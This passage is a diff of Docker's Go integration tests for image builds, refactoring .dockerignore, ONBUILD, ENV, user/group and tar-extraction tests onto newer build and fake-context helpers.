buildImageSuccessfully(c, name, build.WithDockerfile(`FROM scratch + EXPOSE 2375`)) ports1 := inspectField(c, name, "Config.ExposedPorts") - _, err = buildImage(name, - fmt.Sprintf(`FROM %s - ENTRYPOINT ["/bin/echo"]`, name), - true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile(fmt.Sprintf(`FROM %s + ENTRYPOINT ["/bin/echo"]`, name))) res := inspectField(c, name, "Config.Entrypoint") if expected := "[/bin/echo]"; res != expected { @@ -3033,78 +2229,52 @@ func (s *DockerSuite) TestBuildInheritance(c *check.C) { func (s *DockerSuite) TestBuildFails(c *check.C) { name := "testbuildfails" - _, err := buildImage(name, - `FROM busybox - RUN sh -c "exit 23"`, - true) - if err != nil { - if !strings.Contains(err.Error(), "returned a non-zero code: 23") { - c.Fatalf("Wrong error %v, 
must be about non-zero code 23", err) - } - } else { - c.Fatal("Error must not be nil") - } + buildImage(name, build.WithDockerfile(`FROM busybox + RUN sh -c "exit 23"`)).Assert(c, icmd.Expected{ + ExitCode: 23, + Err: "returned a non-zero code: 23", + }) } func (s *DockerSuite) TestBuildOnBuild(c *check.C) { name := "testbuildonbuild" - _, err := buildImage(name, - `FROM busybox - ONBUILD RUN touch foobar`, - true) - if err != nil { - c.Fatal(err) - } - _, err = buildImage(name, - fmt.Sprintf(`FROM %s - RUN [ -f foobar ]`, name), - true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox + ONBUILD RUN touch foobar`)) + buildImageSuccessfully(c, name, build.WithDockerfile(fmt.Sprintf(`FROM %s + RUN [ -f foobar ]`, name))) } // gh #2446 func (s *DockerSuite) TestBuildAddToSymlinkDest(c *check.C) { makeLink := `ln -s /foo /bar` - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { makeLink = `mklink /D C:\bar C:\foo` } name := "testbuildaddtosymlinkdest" - ctx, err := fakeContext(`FROM busybox - RUN sh -c "mkdir /foo" - RUN `+makeLink+` - ADD foo /bar/ - RUN sh -c "[ -f /bar/foo ]" - RUN sh -c "[ -f /foo/foo ]"`, - map[string]string{ - "foo": "hello", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", ` + FROM busybox + RUN sh -c "mkdir /foo" + RUN `+makeLink+` + ADD foo /bar/ + RUN sh -c "[ -f /bar/foo ]" + RUN sh -c "[ -f /foo/foo ]"`), + build.WithFile("foo", "hello"), + )) } func (s *DockerSuite) TestBuildEscapeWhitespace(c *check.C) { name := "testbuildescapewhitespace" - _, err := buildImage(name, ` + buildImageSuccessfully(c, name, build.WithDockerfile(` # ESCAPE=\ FROM busybox MAINTAINER "Docker \ IO " - `, true) - if err != nil { - c.Fatal(err) - } + `)) res := inspectField(c, name, "Author") - if res 
!= "\"Docker IO \"" { c.Fatalf("Parsed string did not match the escaped string. Got: %q", res) } @@ -3115,17 +2285,11 @@ func (s *DockerSuite) TestBuildVerifyIntString(c *check.C) { // Verify that strings that look like ints are still passed as strings name := "testbuildstringing" - _, err := buildImage(name, ` - FROM busybox - MAINTAINER 123 - `, true) - - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile(` + FROM busybox + MAINTAINER 123`)) out, _ := dockerCmd(c, "inspect", name) - if !strings.Contains(out, "\"123\"") { c.Fatalf("Output does not contain the int as a string:\n%s", out) } @@ -3134,9 +2298,10 @@ func (s *DockerSuite) TestBuildVerifyIntString(c *check.C) { func (s *DockerSuite) TestBuildDockerignore(c *check.C) { name := "testbuilddockerignore" - dockerfile := ` - FROM busybox - ADD . /bla + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", ` + FROM busybox + ADD . /bla RUN sh -c "[[ -f /bla/src/x.go ]]" RUN sh -c "[[ -f /bla/Makefile ]]" RUN sh -c "[[ ! -e /bla/src/_vendor ]]" @@ -3147,62 +2312,48 @@ func (s *DockerSuite) TestBuildDockerignore(c *check.C) { RUN sh -c "[[ ! -e /bla/.git ]]" RUN sh -c "[[ ! -e v.cc ]]" RUN sh -c "[[ ! -e src/v.cc ]]" - RUN sh -c "[[ ! -e src/_vendor/v.cc ]]"` - ctx, err := fakeContext(dockerfile, map[string]string{ - "Makefile": "all:", - ".git/HEAD": "ref: foo", - "src/x.go": "package main", - "src/_vendor/v.go": "package main", - "src/_vendor/v.cc": "package main", - "src/v.cc": "package main", - "v.cc": "package main", - "dir/foo": "", - ".gitignore": "", - "README.md": "readme", - ".dockerignore": ` + RUN sh -c "[[ ! 
-e src/_vendor/v.cc ]]"`), + build.WithFile("Makefile", "all:"), + build.WithFile(".git/HEAD", "ref: foo"), + build.WithFile("src/x.go", "package main"), + build.WithFile("src/_vendor/v.go", "package main"), + build.WithFile("src/_vendor/v.cc", "package main"), + build.WithFile("src/v.cc", "package main"), + build.WithFile("v.cc", "package main"), + build.WithFile("dir/foo", ""), + build.WithFile(".gitignore", ""), + build.WithFile("README.md", "readme"), + build.WithFile(".dockerignore", ` .git pkg .gitignore src/_vendor *.md **/*.cc -dir`, - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } +dir`), + )) } func (s *DockerSuite) TestBuildDockerignoreCleanPaths(c *check.C) { name := "testbuilddockerignorecleanpaths" - dockerfile := ` + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", ` FROM busybox ADD . /tmp/ - RUN sh -c "(! ls /tmp/foo) && (! ls /tmp/foo2) && (! ls /tmp/dir1/foo)"` - ctx, err := fakeContext(dockerfile, map[string]string{ - "foo": "foo", - "foo2": "foo2", - "dir1/foo": "foo in dir1", - ".dockerignore": "./foo\ndir1//foo\n./dir1/../foo2", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } + RUN sh -c "(! ls /tmp/foo) && (! ls /tmp/foo2) && (! ls /tmp/dir1/foo)"`), + build.WithFile("foo", "foo"), + build.WithFile("foo2", "foo2"), + build.WithFile("dir1/foo", "foo in dir1"), + build.WithFile(".dockerignore", "./foo\ndir1//foo\n./dir1/../foo2"), + )) } func (s *DockerSuite) TestBuildDockerignoreExceptions(c *check.C) { name := "testbuilddockerignoreexceptions" - dockerfile := ` - FROM busybox - ADD . /bla + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", ` + FROM busybox + ADD . /bla RUN sh -c "[[ -f /bla/src/x.go ]]" RUN sh -c "[[ -f /bla/Makefile ]]" RUN sh -c "[[ ! 
-e /bla/src/_vendor ]]" @@ -3214,22 +2365,21 @@ func (s *DockerSuite) TestBuildDockerignoreExceptions(c *check.C) { RUN sh -c "[[ -f /bla/dir/e-dir/foo ]]" RUN sh -c "[[ ! -e /bla/foo ]]" RUN sh -c "[[ ! -e /bla/.git ]]" - RUN sh -c "[[ -e /bla/dir/a.cc ]]"` - ctx, err := fakeContext(dockerfile, map[string]string{ - "Makefile": "all:", - ".git/HEAD": "ref: foo", - "src/x.go": "package main", - "src/_vendor/v.go": "package main", - "dir/foo": "", - "dir/foo1": "", - "dir/dir/f1": "", - "dir/dir/foo": "", - "dir/e": "", - "dir/e-dir/foo": "", - ".gitignore": "", - "README.md": "readme", - "dir/a.cc": "hello", - ".dockerignore": ` + RUN sh -c "[[ -e /bla/dir/a.cc ]]"`), + build.WithFile("Makefile", "all:"), + build.WithFile(".git/HEAD", "ref: foo"), + build.WithFile("src/x.go", "package main"), + build.WithFile("src/_vendor/v.go", "package main"), + build.WithFile("dir/foo", ""), + build.WithFile("dir/foo1", ""), + build.WithFile("dir/dir/f1", ""), + build.WithFile("dir/dir/foo", ""), + build.WithFile("dir/e", ""), + build.WithFile("dir/e-dir/foo", ""), + build.WithFile(".gitignore", ""), + build.WithFile("README.md", "readme"), + build.WithFile("dir/a.cc", "hello"), + build.WithFile(".dockerignore", ` .git pkg .gitignore @@ -3239,228 +2389,174 @@ dir !dir/e* !dir/dir/foo **/*.cc -!**/*.cc`, - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } +!**/*.cc`), + )) } func (s *DockerSuite) TestBuildDockerignoringDockerfile(c *check.C) { name := "testbuilddockerignoredockerfile" dockerfile := ` - FROM busybox + FROM busybox ADD . /tmp/ RUN sh -c "! 
ls /tmp/Dockerfile" RUN ls /tmp/.dockerignore` - ctx, err := fakeContext(dockerfile, map[string]string{ - "Dockerfile": dockerfile, - ".dockerignore": "Dockerfile\n", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err = buildImageFromContext(name, ctx, true); err != nil { - c.Fatalf("Didn't ignore Dockerfile correctly:%s", err) - } - - // now try it with ./Dockerfile - ctx.Add(".dockerignore", "./Dockerfile\n") - if _, err = buildImageFromContext(name, ctx, true); err != nil { - c.Fatalf("Didn't ignore ./Dockerfile correctly:%s", err) - } - + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", dockerfile), + build.WithFile(".dockerignore", "Dockerfile\n"), + )) + // FIXME(vdemeester) why twice ? + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", dockerfile), + build.WithFile(".dockerignore", "./Dockerfile\n"), + )) } func (s *DockerSuite) TestBuildDockerignoringRenamedDockerfile(c *check.C) { name := "testbuilddockerignoredockerfile" dockerfile := ` - FROM busybox + FROM busybox ADD . /tmp/ RUN ls /tmp/Dockerfile RUN sh -c "! 
ls /tmp/MyDockerfile" RUN ls /tmp/.dockerignore` - ctx, err := fakeContext(dockerfile, map[string]string{ - "Dockerfile": "Should not use me", - "MyDockerfile": dockerfile, - ".dockerignore": "MyDockerfile\n", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err = buildImageFromContext(name, ctx, true); err != nil { - c.Fatalf("Didn't ignore MyDockerfile correctly:%s", err) - } - - // now try it with ./MyDockerfile - ctx.Add(".dockerignore", "./MyDockerfile\n") - if _, err = buildImageFromContext(name, ctx, true); err != nil { - c.Fatalf("Didn't ignore ./MyDockerfile correctly:%s", err) - } - + buildImageSuccessfully(c, name, cli.WithFlags("-f", "MyDockerfile"), build.WithBuildContext(c, + build.WithFile("Dockerfile", "Should not use me"), + build.WithFile("MyDockerfile", dockerfile), + build.WithFile(".dockerignore", "MyDockerfile\n"), + )) + // FIXME(vdemeester) why twice ? + buildImageSuccessfully(c, name, cli.WithFlags("-f", "MyDockerfile"), build.WithBuildContext(c, + build.WithFile("Dockerfile", "Should not use me"), + build.WithFile("MyDockerfile", dockerfile), + build.WithFile(".dockerignore", "./MyDockerfile\n"), + )) } func (s *DockerSuite) TestBuildDockerignoringDockerignore(c *check.C) { name := "testbuilddockerignoredockerignore" dockerfile := ` - FROM busybox + FROM busybox ADD . /tmp/ RUN sh -c "! 
ls /tmp/.dockerignore" RUN ls /tmp/Dockerfile` - ctx, err := fakeContext(dockerfile, map[string]string{ - "Dockerfile": dockerfile, - ".dockerignore": ".dockerignore\n", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - if _, err = buildImageFromContext(name, ctx, true); err != nil { - c.Fatalf("Didn't ignore .dockerignore correctly:%s", err) - } + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", dockerfile), + build.WithFile(".dockerignore", ".dockerignore\n"), + )) } func (s *DockerSuite) TestBuildDockerignoreTouchDockerfile(c *check.C) { - var id1 string - var id2 string - name := "testbuilddockerignoretouchdockerfile" dockerfile := ` FROM busybox ADD . /tmp/` - ctx, err := fakeContext(dockerfile, map[string]string{ - "Dockerfile": dockerfile, - ".dockerignore": "Dockerfile\n", - }) - if err != nil { - c.Fatal(err) - } + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFiles(map[string]string{ + ".dockerignore": "Dockerfile\n", + })) defer ctx.Close() - if id1, err = buildImageFromContext(name, ctx, true); err != nil { - c.Fatalf("Didn't build it correctly:%s", err) - } + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) + id1 := getIDByName(c, name) - if id2, err = buildImageFromContext(name, ctx, true); err != nil { - c.Fatalf("Didn't build it correctly:%s", err) - } + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) + id2 := getIDByName(c, name) if id1 != id2 { c.Fatalf("Didn't use the cache - 1") } // Now make sure touching Dockerfile doesn't invalidate the cache - if err = ctx.Add("Dockerfile", dockerfile+"\n# hi"); err != nil { + if err := ctx.Add("Dockerfile", dockerfile+"\n# hi"); err != nil { c.Fatalf("Didn't add Dockerfile: %s", err) } - if id2, err = buildImageFromContext(name, ctx, true); err != nil { - c.Fatalf("Didn't build it correctly:%s", err) - } + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) + id2 = getIDByName(c, 
name) if id1 != id2 { c.Fatalf("Didn't use the cache - 2") } // One more time but just 'touch' it instead of changing the content - if err = ctx.Add("Dockerfile", dockerfile+"\n# hi"); err != nil { + if err := ctx.Add("Dockerfile", dockerfile+"\n# hi"); err != nil { c.Fatalf("Didn't add Dockerfile: %s", err) } - if id2, err = buildImageFromContext(name, ctx, true); err != nil { - c.Fatalf("Didn't build it correctly:%s", err) - } + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) + id2 = getIDByName(c, name) if id1 != id2 { c.Fatalf("Didn't use the cache - 3") } - } func (s *DockerSuite) TestBuildDockerignoringWholeDir(c *check.C) { name := "testbuilddockerignorewholedir" + dockerfile := ` - FROM busybox + FROM busybox COPY . / RUN sh -c "[[ ! -e /.gitignore ]]" - RUN sh -c "[[ -f /Makefile ]]"` - ctx, err := fakeContext(dockerfile, map[string]string{ - "Dockerfile": "FROM scratch", - "Makefile": "all:", - ".gitignore": "", - ".dockerignore": ".*\n", - }) - c.Assert(err, check.IsNil) - defer ctx.Close() - if _, err = buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } + RUN sh -c "[[ ! -e /Makefile ]]"` - c.Assert(ctx.Add(".dockerfile", "*"), check.IsNil) - if _, err = buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", dockerfile), + build.WithFile(".dockerignore", "*\n"), + build.WithFile("Makefile", "all:"), + build.WithFile(".gitignore", ""), + )) +} - c.Assert(ctx.Add(".dockerfile", "."), check.IsNil) - if _, err = buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } +func (s *DockerSuite) TestBuildDockerignoringOnlyDotfiles(c *check.C) { + name := "testbuilddockerignorewholedir" - c.Assert(ctx.Add(".dockerfile", "?"), check.IsNil) - if _, err = buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } + dockerfile := ` + FROM busybox + COPY . / + RUN sh -c "[[ ! 
-e /.gitignore ]]" + RUN sh -c "[[ -f /Makefile ]]"` + + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", dockerfile), + build.WithFile(".dockerignore", ".*"), + build.WithFile("Makefile", "all:"), + build.WithFile(".gitignore", ""), + )) } func (s *DockerSuite) TestBuildDockerignoringBadExclusion(c *check.C) { name := "testbuilddockerignorebadexclusion" - dockerfile := ` - FROM busybox + buildImage(name, build.WithBuildContext(c, + build.WithFile("Dockerfile", ` + FROM busybox COPY . / RUN sh -c "[[ ! -e /.gitignore ]]" - RUN sh -c "[[ -f /Makefile ]]"` - ctx, err := fakeContext(dockerfile, map[string]string{ - "Dockerfile": "FROM scratch", - "Makefile": "all:", - ".gitignore": "", - ".dockerignore": "!\n", + RUN sh -c "[[ -f /Makefile ]]"`), + build.WithFile("Makefile", "all:"), + build.WithFile(".gitignore", ""), + build.WithFile(".dockerignore", "!\n"), + )).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: `illegal exclusion pattern: "!"`, }) - c.Assert(err, check.IsNil) - defer ctx.Close() - if _, err = buildImageFromContext(name, ctx, true); err == nil { - c.Fatalf("Build was supposed to fail but didn't") - } - - if err.Error() != "failed to build the image: Error checking context: 'Illegal exclusion pattern: !'.\n" { - c.Fatalf("Incorrect output, got:%q", err.Error()) - } } func (s *DockerSuite) TestBuildDockerignoringWildTopDir(c *check.C) { dockerfile := ` - FROM busybox + FROM busybox COPY . / RUN sh -c "[[ ! -e /.dockerignore ]]" RUN sh -c "[[ ! -e /Dockerfile ]]" RUN sh -c "[[ ! -e /file1 ]]" RUN sh -c "[[ ! 
-e /dir ]]"` - ctx, err := fakeContext(dockerfile, map[string]string{ - "Dockerfile": "FROM scratch", - "file1": "", - "dir/dfile1": "", - }) - c.Assert(err, check.IsNil) - defer ctx.Close() - // All of these should result in ignoring all files for _, variant := range []string{"**", "**/", "**/**", "*"} { - ctx.Add(".dockerignore", variant) - _, err = buildImageFromContext("noname", ctx, true) - c.Assert(err, check.IsNil, check.Commentf("variant: %s", variant)) + buildImageSuccessfully(c, "noname", build.WithBuildContext(c, + build.WithFile("Dockerfile", dockerfile), + build.WithFile("file1", ""), + build.WithFile("dir/file1", ""), + build.WithFile(".dockerignore", variant), + )) + + dockerCmd(c, "rmi", "noname") } } @@ -3491,31 +2587,7 @@ func (s *DockerSuite) TestBuildDockerignoringWildDirs(c *check.C) { RUN echo all done!` - ctx, err := fakeContext(dockerfile, map[string]string{ - "Dockerfile": "FROM scratch", - "file0": "", - "dir1/file0": "", - "dir1/dir2/file0": "", - - "file1": "", - "dir1/file1": "", - "dir1/dir2/file1": "", - - "dir1/file2": "", - "dir1/dir2/file2": "", // remains - - "dir1/dir2/file4": "", - "dir1/dir2/file5": "", - "dir1/dir2/file6": "", - "dir1/dir3/file7": "", - "dir1/dir3/file8": "", - "dir1/dir4/file9": "", - - "dir1/dir5/fileAA": "", - "dir1/dir5/fileAB": "", - "dir1/dir5/fileB": "", - - ".dockerignore": ` + dockerignore := ` **/file0 **/*file1 **/dir1/file2 @@ -3527,52 +2599,56 @@ dir1/dir3/** **/file?A **/file\?B **/dir5/file. 
-`, - }) - c.Assert(err, check.IsNil) - defer ctx.Close() +` - _, err = buildImageFromContext("noname", ctx, true) - c.Assert(err, check.IsNil) + buildImageSuccessfully(c, "noname", build.WithBuildContext(c, + build.WithFile("Dockerfile", dockerfile), + build.WithFile(".dockerignore", dockerignore), + build.WithFile("dir1/file0", ""), + build.WithFile("dir1/dir2/file0", ""), + build.WithFile("file1", ""), + build.WithFile("dir1/file1", ""), + build.WithFile("dir1/dir2/file1", ""), + build.WithFile("dir1/file2", ""), + build.WithFile("dir1/dir2/file2", ""), // remains + build.WithFile("dir1/dir2/file4", ""), + build.WithFile("dir1/dir2/file5", ""), + build.WithFile("dir1/dir2/file6", ""), + build.WithFile("dir1/dir3/file7", ""), + build.WithFile("dir1/dir3/file8", ""), + build.WithFile("dir1/dir4/file9", ""), + build.WithFile("dir1/dir5/fileAA", ""), + build.WithFile("dir1/dir5/fileAB", ""), + build.WithFile("dir1/dir5/fileB", ""), + )) } func (s *DockerSuite) TestBuildLineBreak(c *check.C) { testRequires(c, DaemonIsLinux) name := "testbuildlinebreak" - _, err := buildImage(name, - `FROM busybox + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox RUN sh -c 'echo root:testpass \ > /tmp/passwd' RUN mkdir -p /var/run/sshd RUN sh -c "[ "$(cat /tmp/passwd)" = "root:testpass" ]" -RUN sh -c "[ "$(ls -d /var/run/sshd)" = "/var/run/sshd" ]"`, - true) - if err != nil { - c.Fatal(err) - } +RUN sh -c "[ "$(ls -d /var/run/sshd)" = "/var/run/sshd" ]"`)) } func (s *DockerSuite) TestBuildEOLInLine(c *check.C) { testRequires(c, DaemonIsLinux) name := "testbuildeolinline" - _, err := buildImage(name, - `FROM busybox + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox RUN sh -c 'echo root:testpass > /tmp/passwd' RUN echo "foo \n bar"; echo "baz" RUN mkdir -p /var/run/sshd RUN sh -c "[ "$(cat /tmp/passwd)" = "root:testpass" ]" -RUN sh -c "[ "$(ls -d /var/run/sshd)" = "/var/run/sshd" ]"`, - true) - if err != nil { - c.Fatal(err) - } +RUN sh -c "[ "$(ls 
-d /var/run/sshd)" = "/var/run/sshd" ]"`)) } func (s *DockerSuite) TestBuildCommentsShebangs(c *check.C) { testRequires(c, DaemonIsLinux) name := "testbuildcomments" - _, err := buildImage(name, - `FROM busybox + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox # This is an ordinary comment. RUN { echo '#!/bin/sh'; echo 'echo hello world'; } > /hello.sh RUN [ ! -x /hello.sh ] @@ -3580,18 +2656,13 @@ RUN [ ! -x /hello.sh ] RUN chmod +x /hello.sh RUN [ -x /hello.sh ] RUN [ "$(cat /hello.sh)" = $'#!/bin/sh\necho hello world' ] -RUN [ "$(/hello.sh)" = "hello world" ]`, - true) - if err != nil { - c.Fatal(err) - } +RUN [ "$(/hello.sh)" = "hello world" ]`)) } func (s *DockerSuite) TestBuildUsersAndGroups(c *check.C) { testRequires(c, DaemonIsLinux) name := "testbuildusers" - _, err := buildImage(name, - `FROM busybox + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox # Make sure our defaults work RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)" = '0:0/root:root' ] @@ -3640,13 +2711,10 @@ RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1002/do # make sure unknown uid/gid still works properly USER 1042:1043 -RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1042:1043/1042:1043/1043:1043' ]`, - true) - if err != nil { - c.Fatal(err) - } +RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1042:1043/1042:1043/1043:1043' ]`)) } +// FIXME(vdemeester) rename this test (and probably "merge" it with the one below TestBuildEnvUsage2) func (s *DockerSuite) TestBuildEnvUsage(c *check.C) { // /docker/world/hello is not owned by the correct user testRequires(c, NotUserNamespace) @@ -3663,7 +2731,7 @@ ENV BAZ $BAR ENV FOOPATH $PATH:$FOO RUN [ "$BAR" = "$BAZ" ] RUN [ "$FOOPATH" = "$PATH:/foo/baz" ] -ENV FROM hello/docker/world +ENV FROM hello/docker/world ENV TO /docker/world/hello ADD $FROM $TO RUN [ "$(cat $TO)" = "hello" ] @@ -3671,20 +2739,13 @@ ENV abc=def ENV ghi=$abc RUN [ "$ghi" = "def" ] 
` - ctx, err := fakeContext(dockerfile, map[string]string{ - "hello/docker/world": "hello", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - _, err = buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", dockerfile), + build.WithFile("hello/docker/world", "hello"), + )) } +// FIXME(vdemeester) rename this test (and probably "merge" it with the one above TestBuildEnvUsage) func (s *DockerSuite) TestBuildEnvUsage2(c *check.C) { // /docker/world/hello is not owned by the correct user testRequires(c, NotUserNamespace) @@ -3748,18 +2809,10 @@ ENV eee4 'foo' RUN [ "$eee1,$eee2,$eee3,$eee4" = 'foo,foo,foo,foo' ] ` - ctx, err := fakeContext(dockerfile, map[string]string{ - "hello/docker/world": "hello", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - _, err = buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", dockerfile), + build.WithFile("hello/docker/world", "hello"), + )) } func (s *DockerSuite) TestBuildAddScript(c *check.C) { @@ -3771,18 +2824,11 @@ ADD test /test RUN ["chmod","+x","/test"] RUN ["/test"] RUN [ "$(cat /testfile)" = 'test!' ]` - ctx, err := fakeContext(dockerfile, map[string]string{ - "test": "#!/bin/sh\necho 'test!' > /testfile", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - _, err = buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", dockerfile), + build.WithFile("test", "#!/bin/sh\necho 'test!' 
> /testfile"), + )) } func (s *DockerSuite) TestBuildAddTar(c *check.C) { @@ -3790,7 +2836,7 @@ func (s *DockerSuite) TestBuildAddTar(c *check.C) { testRequires(c, NotUserNamespace) name := "testbuildaddtar" - ctx := func() *FakeContext { + ctx := func() *fakecontext.Fake { dockerfile := ` FROM busybox ADD test.tar / @@ -3832,20 +2878,17 @@ RUN cat /existing-directory-trailing-slash/test/foo | grep Hi` if err := ioutil.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte(dockerfile), 0644); err != nil { c.Fatalf("failed to open destination dockerfile: %v", err) } - return fakeContextFromDir(tmpDir) + return fakecontext.New(c, tmpDir) }() defer ctx.Close() - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatalf("build failed to complete for TestBuildAddTar: %v", err) - } - + buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx)) } func (s *DockerSuite) TestBuildAddBrokenTar(c *check.C) { name := "testbuildaddbrokentar" - ctx := func() *FakeContext { + ctx := func() *fakecontext.Fake { dockerfile := ` FROM busybox ADD test.tar /` @@ -3884,33 +2927,26 @@ ADD test.tar /` if err := ioutil.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte(dockerfile), 0644); err != nil { c.Fatalf("failed to open destination dockerfile: %v", err) } - return fakeContextFromDir(tmpDir) + return fakecontext.New(c, tmpDir) }() defer ctx.Close() - if _, err := buildImageFromContext(name, ctx, true); err == nil { - c.Fatalf("build should have failed for TestBuildAddBrokenTar") - } + buildImage(name, build.WithExternalBuildContext(ctx)).Assert(c, icmd.Expected{ + ExitCode: 1, + }) } func (s *DockerSuite) TestBuildAddNonTar(c *check.C) { name := "testbuildaddnontar" // Should not try to extract test.tar - ctx, err := fakeContext(` + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", ` FROM busybox ADD test.tar / - RUN test -f /test.tar`, - map[string]string{"test.tar": "not_a_tar_file"}) - - if err != nil { - 
c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatalf("build failed for TestBuildAddNonTar") - } + RUN test -f /test.tar`), + build.WithFile("test.tar", "not_a_tar_file"), + )) } func (s *DockerSuite) TestBuildAddTarXz(c *check.C) { @@ -3919,7 +2955,7 @@ func (s *DockerSuite) TestBuildAddTarXz(c *check.C) { testRequires(c, DaemonIsLinux) name := "testbuildaddtarxz" - ctx := func() *FakeContext { + ctx := func() *fakecontext.Fake { dockerfile := ` FROM busybox ADD test.tar.xz / @@ -3947,32 +2983,26 @@ func (s *DockerSuite) TestBuildAddTarXz(c *check.C) { c.Fatalf("failed to close tar archive: %v", err) } - xzCompressCmd := exec.Command("xz", "-k", "test.tar") - xzCompressCmd.Dir = tmpDir - out, _, err := runCommandWithOutput(xzCompressCmd) - if err != nil { - c.Fatal(err, out) - } - + icmd.RunCmd(icmd.Cmd{ + Command: []string{"xz", "-k", "test.tar"}, + Dir: tmpDir, + }).Assert(c, icmd.Success) if err := ioutil.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte(dockerfile), 0644); err != nil { c.Fatalf("failed to open destination dockerfile: %v", err) } - return fakeContextFromDir(tmpDir) + return fakecontext.New(c, tmpDir) }() defer ctx.Close() - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatalf("build failed to complete for TestBuildAddTarXz: %v", err) - } - + buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx)) } func (s *DockerSuite) TestBuildAddTarXzGz(c *check.C) { testRequires(c, DaemonIsLinux) name := "testbuildaddtarxzgz" - ctx := func() *FakeContext { + ctx := func() *fakecontext.Fake { dockerfile := ` FROM busybox ADD test.tar.xz.gz / @@ -4000,52 +3030,40 @@ func (s *DockerSuite) TestBuildAddTarXzGz(c *check.C) { c.Fatalf("failed to close tar archive: %v", err) } - xzCompressCmd := exec.Command("xz", "-k", "test.tar") - xzCompressCmd.Dir = tmpDir - out, _, err := runCommandWithOutput(xzCompressCmd) - if err != nil { - c.Fatal(err, out) - } - - 
gzipCompressCmd := exec.Command("gzip", "test.tar.xz") - gzipCompressCmd.Dir = tmpDir - out, _, err = runCommandWithOutput(gzipCompressCmd) - if err != nil { - c.Fatal(err, out) - } + icmd.RunCmd(icmd.Cmd{ + Command: []string{"xz", "-k", "test.tar"}, + Dir: tmpDir, + }).Assert(c, icmd.Success) + icmd.RunCmd(icmd.Cmd{ + Command: []string{"gzip", "test.tar.xz"}, + Dir: tmpDir, + }) if err := ioutil.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte(dockerfile), 0644); err != nil { c.Fatalf("failed to open destination dockerfile: %v", err) } - return fakeContextFromDir(tmpDir) + return fakecontext.New(c, tmpDir) }() defer ctx.Close() - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatalf("build failed to complete for TestBuildAddTarXz: %v", err) - } - + buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx)) } +// FIXME(vdemeester) most of the from git tests could be moved to `docker/cli` e2e tests func (s *DockerSuite) TestBuildFromGit(c *check.C) { name := "testbuildfromgit" - git, err := newFakeGit("repo", map[string]string{ + git := fakegit.New(c, "repo", map[string]string{ "Dockerfile": `FROM busybox - ADD first /first - RUN [ -f /first ] - MAINTAINER docker`, + ADD first /first + RUN [ -f 